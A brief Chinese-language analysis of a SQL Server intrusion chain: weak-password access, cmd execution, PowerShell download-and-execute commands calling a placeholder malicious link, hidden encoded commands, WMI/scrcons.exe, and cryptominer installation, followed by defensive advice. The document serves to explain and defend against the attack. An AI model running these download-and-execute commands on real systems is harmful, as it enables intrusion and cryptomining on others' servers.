首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令
"C:\Windows\system32\cmd.exe" /c whoami
whoami是操作系统中用于查看当前有效用户名的命令
执行ps命令
powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"
or
"C:\Windows\system32\cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))"
主动连接恶意下载源,下载看起来人畜无害的文件,病毒程序可以只是一张图片
利用PowerShell访问恶意地址 执行命令
-NoProfile -w hidden -EncodedCommand 加密命令
利用脚本宿主scrcons.exe(浏览器主页劫持常常用到它)或WMI
最后下载挖矿程序到本机,启动并开始挖矿
这个过程中恶意链接可以是伪造的虚拟的临时的中间的,真正恶意的地址一定是封装成了看似人畜无害的文件里,读取出文件数据执行一系列ps命令,并下载挖矿程序并执行。
防范手段:
Sqlserver账号密码加固,定期变更
禁止一般用不到却可能被恶意用的命令
监控系统工具的调用
控制出站(服务器通常不需要请求外部,若需要,配置出站白名单)